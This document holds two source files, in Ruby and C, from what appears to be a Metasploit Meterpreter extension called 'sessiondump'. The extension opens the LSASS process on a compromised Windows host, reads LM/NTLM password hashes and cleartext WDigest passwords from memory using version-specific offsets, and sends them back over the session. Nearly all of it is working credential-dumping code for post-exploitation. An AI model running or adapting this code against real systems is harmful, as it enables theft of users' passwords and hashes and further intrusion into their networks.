File: lib/rex/post/meterpreter/extensions/sessiondump/sessiondump.rb
#!/usr/bin/env ruby

require 'rex/post/meterpreter/extensions/sessiondump/tlv'

module Rex
module Post
module Meterpreter
module Extensions
module SessionDump

###
#
# This meterpreter extension can be used to dump hashes and passwords from memory
# Compatible with x86 and x64 systems from Windows XP/2003 to Windows 8/2012
# Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
# http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
#
###
class SessionDump < Extension

	def initialize(client)
		super(client, 'sessiondump')

		client.register_extension_aliases(
			[
				{
					'name' => 'sessiondump',
					'ext'  => self
				},
			])
	end

	def read_csv_file(file_path, dll_name)
		# Read CSV file containing offsets for lsasrv.dll or wdigest.dll
		f = open(file_path, 'r')
		f_content = f.readlines()
		f.close()

		csv_parsed = {}
		f_content.each do |l|
			line_parsed = l.split(',')

			if dll_name == 'lsasrv.dll'
				csv_parsed["#{line_parsed[0]}.#{line_parsed[1]}"] = {
								'encryptmemory' => line_parsed[2],
								'logon_session_list_addr' => line_parsed[3],
								'logon_session_list_count' => line_parsed[4],
								'feedback_addr' => line_parsed[5],
								'deskey_ptr_addr' => line_parsed[6],
								'threedeskey_ptr_addr' => line_parsed[7],
								'iv_addr' => line_parsed[8].chomp.chomp}
			elsif dll_name == 'wdigest.dll'
				csv_parsed["#{line_parsed[0]}.#{line_parsed[1]}"] = {
								'wdigest_session_list' => line_parsed[2].chomp.chomp}
			end
		end
		return csv_parsed
	end

	def read_csv_input(dll_name, csv_data)
		# Read offsets passed to get_hashes and get_password via -i option
		input_parsed = csv_data.split(',', 8)

		csv_parsed = {}
		if dll_name == 'lsasrv.dll'
			if input_parsed.size() < 7
				return nil
			end
			csv_parsed['encryptmemory'] = input_parsed[0].to_i
			csv_parsed['logon_session_list_addr'] = input_parsed[1].to_i
			csv_parsed['logon_session_list_count'] = input_parsed[2].to_i
			csv_parsed['feedback_addr'] = input_parsed[3].to_i
			csv_parsed['deskey_ptr_addr'] = input_parsed[4].to_i
			csv_parsed['threedeskey_ptr_addr'] = input_parsed[5].to_i
			csv_parsed['iv_addr'] = input_parsed[6].to_i
		end
		if dll_name == 'wdigest.dll'
			if input_parsed.size() != 8
				return nil
			end
			csv_parsed['wdigest_session_list'] = input_parsed[7].to_i
		end
		return csv_parsed
	end

	def get_dll_version(dll_name)
		# Get version of lsasrv.dll or wdigest.dll
		req = Packet.create_request('getDllVer')
		req.add_tlv(TLV_TYPE_VERSION_DLL_REQUEST, dll_name)
		res = client.send_request(req)
		dll_version = res.get_tlv_value(TLV_TYPE_VERSION_DLL_ANSWER)
		if dll_version == "error"
			return nil
		else
			return dll_version
		end
	end

	def get_symbols_addresses(path_file, dll_version, dll_name)
		# Parse CSV file in order to get offsets relating to DLL versions of
		# the compromise computer
		csv_content = client.sessiondump.read_csv_file(path_file, dll_name)
		arch = client.sys.config.sysinfo['Architecture']
		csv_key = "#{dll_version}.#{arch}"

		if csv_content.key?(csv_key)
			symb_addr = csv_content[csv_key]
			return symb_addr
		else
			return nil
		end
	end

	def get_hashes(symbols_addr)
		# Extract hashes from Windows memory
		req = Packet.create_request('getHashes')
		symbols_addr.each_pair do |k,v|
			req.add_tlv(TLV_TYPE_SYMBOLS_NAME, k)
			req.add_tlv(TLV_TYPE_SYMBOLS_ADDR, v)
		end
		res = client.send_request(req)

		sessions = []
		session = {}

		res.each do |t|
			if t.type == TLV_TYPE_ERROR
				session['error'] = t.value
				sessions.push(session)
			elsif t.type == TLV_TYPE_DOMAIN
				session['domain'] = t.value
			elsif t.type == TLV_TYPE_USER
				session['user'] = t.value
			elsif t.type == TLV_TYPE_LM
				session['lm'] = t.value
			elsif t.type == TLV_TYPE_NTLM
				session['ntlm'] = t.value
				sessions.push(session)
				session = {}
			end
		end
		return sessions.uniq
	end

	def get_wdigest_passwords(symbols_addr)
		# Extract passwords from Windows memory
		req = Packet.create_request('getWdigestPasswords')
		symbols_addr.each_pair do |k,v|
			req.add_tlv(TLV_TYPE_SYMBOLS_NAME, k)
			req.add_tlv(TLV_TYPE_SYMBOLS_ADDR, v)
		end
		res = client.send_request(req)

		sessions = []
		session = {}

		res.each do |t|
			if t.type == TLV_TYPE_ERROR
				session['error'] = t.value
				sessions.push(session)
			elsif t.type == TLV_TYPE_DOMAIN
				session['domain'] = t.value
			elsif t.type == TLV_TYPE_USER
				session['user'] = t.value
			elsif t.type == TLV_TYPE_PWD
				session['pwd'] = t.value
				sessions.push(session)
				session = {}
			end
		end
		return sessions.uniq
	end

end

end; end; end; end; end

File: external/source/meterpreter/source/extensions/sessiondump/sessiondump.c
/*
 *
 * This meterpreter extension can be used to dump hashes and passwords from memory
 * Compatible with x86 and x64 systems from Windows XP/2003 to Windows 8/2012
 * Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
 * http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
 *
 */

#define _CRT_SECURE_NO_DEPRECATE 1
#include "../../common/common.h"
#include "sessiondump.h"
#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the 
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"

// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();

extern HANDLE hLsass;
extern ADDRESSES symbAddr;
extern ULONG LogonSessionListCount;
extern LONG_PTR LogonSessionList;
extern OSVERSIONINFOEX osvi;
extern BYTE g_Feedback[8];
extern LPVOID g_pDESXKey;
extern BYTE g_DESXKey[400];


DWORD sendErrorTLV(int error, Packet *response, Remote *remote){
	// Send TLV_TYPE_ERROR packet
	DWORD res = ERROR_SUCCESS;
	packet_add_tlv_uint(response, TLV_TYPE_ERROR, error);
	packet_transmit_response(res, remote, response);
	return res;
}

void SymbAddrTlvToStruct(Packet *packet, ADDRESSES *symbAddr, int nbFields){
	// Put symbol offsets received from network in TLV format inside a ADDRESSES structure
	Tlv tlvSymbName, tlvSymbAddr;
	int i;
	LPTSTR tmp = NULL;
	tmp = calloc(SMALL_BUFFER_SIZE, sizeof(TCHAR));
	
	for (i=0 ; i<nbFields ; i++){
		// Get symbol name from TLV
		if (packet_enum_tlv(packet, i, TLV_TYPE_SYMBOLS_NAME, &tlvSymbName) != ERROR_SUCCESS){
			continue;
		}
		// Get symbol address from TLV
		if (packet_enum_tlv(packet, i, TLV_TYPE_SYMBOLS_ADDR, &tlvSymbAddr) != ERROR_SUCCESS){
			continue;
		}

		// Store symbols addresses in appropriate ADDRESSES structure fields
		if (!_tcscmp(_T("encryptmemory"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->LsaEncryptMemoryAddr = atol(tmp);
		} else if (!_tcscmp(_T("logon_session_list_addr"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->LogonSessionListAddr = atol(tmp);
		} else if (!_tcscmp(_T("logon_session_list_count"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->LogonSessionListCountAddr = atol(tmp);
		} else if (!_tcscmp(_T("feedback_addr"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->FeedbackAddr = atol(tmp);
		} else if (!_tcscmp(_T("deskey_ptr_addr"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->PDesxKeyAddr = atol(tmp);
		} else if (!_tcscmp(_T("threedeskey_ptr_addr"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->H3DesKeyAddr = atol(tmp);
		} else if (!_tcscmp(_T("iv_addr"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->IVAddr = atol(tmp);
		} else if (!_tcscmp(_T("wdigest_session_list"), tlvSymbName.buffer)){
			strncpy(tmp, tlvSymbAddr.buffer, SMALL_BUFFER_SIZE);
			tmp[tlvSymbAddr.header.length] = '\0';
			symbAddr->WdigestSessionList = atol(tmp);
		}
	}
};


DWORD getWdigestPasswords(Remote *remote, Packet *packet){
	// Call several sub-functions in order to extract clear-text passwords
	DWORD res = ERROR_SUCCESS;
	LPTSTR buffer = NULL;
	CREDS_INFOS aCredsInfos[SMALL_BUFFER_SIZE];
	int cbSessions = 0, i = 0;

	Packet *response = packet_create_response(packet);
	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(TCHAR));
	SymbAddrTlvToStruct(packet, &symbAddr, 10);

	if (!OpenLsass()){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] OpenLsass() :\n\t Unable to get handle of Lsass process. This can be a problem of rights access."));
		OutputDebugString(buffer);
		return sendErrorTLV(ERROR_SESSIONDUMP_PROCESS, response, remote);
	}

	if (!GetDataInMemory()){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetDataInMemory() :\n\t Fail to extract data from memory in order to uncipher passwords"));
		OutputDebugString(buffer);
		return sendErrorTLV(ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY, response, remote);
	}

	cbSessions = GetWdigestPasswords(&aCredsInfos);
	if (cbSessions == -1){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetWdigestPasswords() :\n\t No session is present in LSASS memory or an unexpected error occurred"));
		OutputDebugString(buffer);
		return sendErrorTLV(ERROR_SESSIONDUMP_GET_WDIGEST_PASSWORDS, response, remote);
	}

	if (!CloseLsass()){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] CloseLsass()"));
		OutputDebugString(buffer);
	}

	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Number of sessions : %d\n"), (cbSessions+1));
	OutputDebugString(buffer);
	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));

	if (cbSessions > SMALL_BUFFER_SIZE){
		cbSessions = SMALL_BUFFER_SIZE;
	}

	for (i = 0 ; i <= cbSessions ; i++){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Session number: %d\n"), i);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tDomain: %s\n"), aCredsInfos[i].Domain);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tUsername: %s\n"), aCredsInfos[i].Username);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tPassword: %s\n"), aCredsInfos[i].Password);
		OutputDebugString(buffer);

		packet_add_tlv_string(response, TLV_TYPE_DOMAIN, aCredsInfos[i].Domain);
		packet_add_tlv_string(response, TLV_TYPE_USER, aCredsInfos[i].Username);
		packet_add_tlv_string(response, TLV_TYPE_PWD, aCredsInfos[i].Password);

	}
	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));

	packet_transmit_response(res, remote, response);
	return res;
}


DWORD getPasswordHashes(Remote *remote, Packet *packet){
	// Call several sub-functions in order to extract password hashes
	DWORD res = ERROR_SUCCESS;
	int cbSessions = 0, i = 0;
	LPTSTR buffer = NULL;
	CREDS_INFOS aCredsInfos[SMALL_BUFFER_SIZE];

	Packet *response = packet_create_response(packet);
	buffer = calloc(LARGE_BUFFER_SIZE, sizeof(TCHAR));
	SymbAddrTlvToStruct(packet, &symbAddr, 9);

	if (!OpenLsass()){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] OpenLsass() :\n\t Fail to get handle of Lsass process. This can be a problem of rights access."));
		OutputDebugString(buffer);
		return sendErrorTLV(ERROR_SESSIONDUMP_PROCESS, response, remote);
	}

	if (!GetDataInMemory()){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetDataInMemory() :\n\t Fail to extract data from memory in order to uncipher passwords"));
		OutputDebugString(buffer);
		return sendErrorTLV(ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY, response, remote);
	}

	cbSessions = GetHashes(&aCredsInfos);
	if (cbSessions == -1){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] GetHashes() :\n\t No session is present in LSASS memory or an unexpected error occurred"));
		OutputDebugString(buffer);
		return sendErrorTLV(ERROR_SESSIONDUMP_GET_HASHES, response, remote);
	}

	if (!CloseLsass()){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("%s\n"), _T("[ERROR] CloseLsass()"));
		OutputDebugString(buffer);
	}
	
	_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Number of sessions: %d\n"), (cbSessions+1));
	OutputDebugString(buffer);
	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));

	if (cbSessions > SMALL_BUFFER_SIZE){
		cbSessions = SMALL_BUFFER_SIZE;
	}

	for (i = 0 ; i <= cbSessions ; i++){
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("Session number: %d\n"), i);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tDomain: %s\n"), aCredsInfos[i].Domain);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tUsername: %s\n"), aCredsInfos[i].Username);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tLM: %s\n"), aCredsInfos[i].LMhash);
		OutputDebugString(buffer);
		_sntprintf_s(buffer, LARGE_BUFFER_SIZE, _TRUNCATE, _T("\tNTLM: %s\n"), aCredsInfos[i].NTLMhash);
		OutputDebugString(buffer);

		packet_add_tlv_string(response, TLV_TYPE_DOMAIN, aCredsInfos[i].Domain);
		packet_add_tlv_string(response, TLV_TYPE_USER, aCredsInfos[i].Username);
		packet_add_tlv_string(response, TLV_TYPE_LM, aCredsInfos[i].LMhash);
		packet_add_tlv_string(response, TLV_TYPE_NTLM, aCredsInfos[i].NTLMhash);
	}
	OutputDebugString(_T("-----------------------------------------------------------------------------\n"));

	packet_transmit_response(res, remote, response);
	return res;
};


DWORD getDllVersion(Remote *remote, Packet *packet){
	// Get version of a DLL file
	DWORD res = ERROR_SUCCESS;
	DWORD dwFileVersionSize;
	LPBYTE lpFileVersionInfo = NULL;
	VS_FIXEDFILEINFO *lpFileInfo = NULL;
	UINT lpFileInfoSize = 0;
	LPBYTE dllpath = NULL, systemroot = NULL;
	char lpszDllVersion[SMALL_BUFFER_SIZE];

	Packet *response = packet_create_response(packet);
	PCHAR dll_name = packet_get_tlv_value_string(packet, TLV_TYPE_VERSION_DLL_REQUEST);

	dllpath = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE);
	systemroot = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SMALL_BUFFER_SIZE);

	// get absolute path to DLL in system32 directory
	GetEnvironmentVariable(_T("systemroot"), systemroot, SMALL_BUFFER_SIZE);
	_sntprintf_s(dllpath, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%s\\System32\\%s"), systemroot, dll_name);
	OutputDebugString(dllpath);

	// get DLL version
	dwFileVersionSize = GetFileVersionInfoSize(_T(dllpath), NULL);
	if (dwFileVersionSize){
		lpFileVersionInfo = (LPBYTE) calloc(dwFileVersionSize, sizeof(BYTE));
		if (GetFileVersionInfo(_T(dllpath), NULL, dwFileVersionSize, lpFileVersionInfo)){
			if (VerQueryValue(lpFileVersionInfo, _T("\\"), &lpFileInfo, &lpFileInfoSize)){
				_sntprintf_s(lpszDllVersion, SMALL_BUFFER_SIZE, _TRUNCATE, _T("%d.%d.%d.%d"), HIWORD(lpFileInfo->dwFileVersionMS), LOWORD(lpFileInfo->dwFileVersionMS), \
				HIWORD(lpFileInfo->dwFileVersionLS), LOWORD(lpFileInfo->dwFileVersionLS));
			}
		}
	}
	
	packet_add_tlv_string(response, TLV_TYPE_VERSION_DLL_ANSWER, lpszDllVersion);
	packet_transmit_response(res, remote, response);

	lpFileInfo = NULL;
	if (lpFileVersionInfo) free(lpFileVersionInfo); lpFileVersionInfo = NULL;
	if (dllpath) HeapFree(GetProcessHeap(), 0, dllpath); dllpath = NULL;
	if (systemroot) HeapFree(GetProcessHeap(), 0, systemroot); systemroot = NULL;
	return res;
};


Command customCommands[] =
{
	{ "getHashes",
	{ getPasswordHashes,						{ 0 }, 0 },
	{ EMPTY_DISPATCH_HANDLER                      },
	},

	{ "getWdigestPasswords",
	{ getWdigestPasswords,						{ 0 }, 0 },
	{ EMPTY_DISPATCH_HANDLER                      },
	},

	{ "getDllVer",
	{ getDllVersion,							{ 0 }, 0 },
	{ EMPTY_DISPATCH_HANDLER                      },
	},

	// Terminator
	{ NULL,
	  { EMPTY_DISPATCH_HANDLER                      },
	  { EMPTY_DISPATCH_HANDLER                      },
	},
};

/*
 * Initialize the server extension
 */
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
	DWORD index;

	hMetSrv = remote->hMetSrv;

	for (index = 0;
	     customCommands[index].method;
	     index++)
		command_register(&customCommands[index]);

	return ERROR_SUCCESS;
}

/*
 * Deinitialize the server extension
 */
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
	DWORD index;

	for (index = 0;
	     customCommands[index].method;
	     index++)
		command_deregister(&customCommands[index]);

	return ERROR_SUCCESS;
}
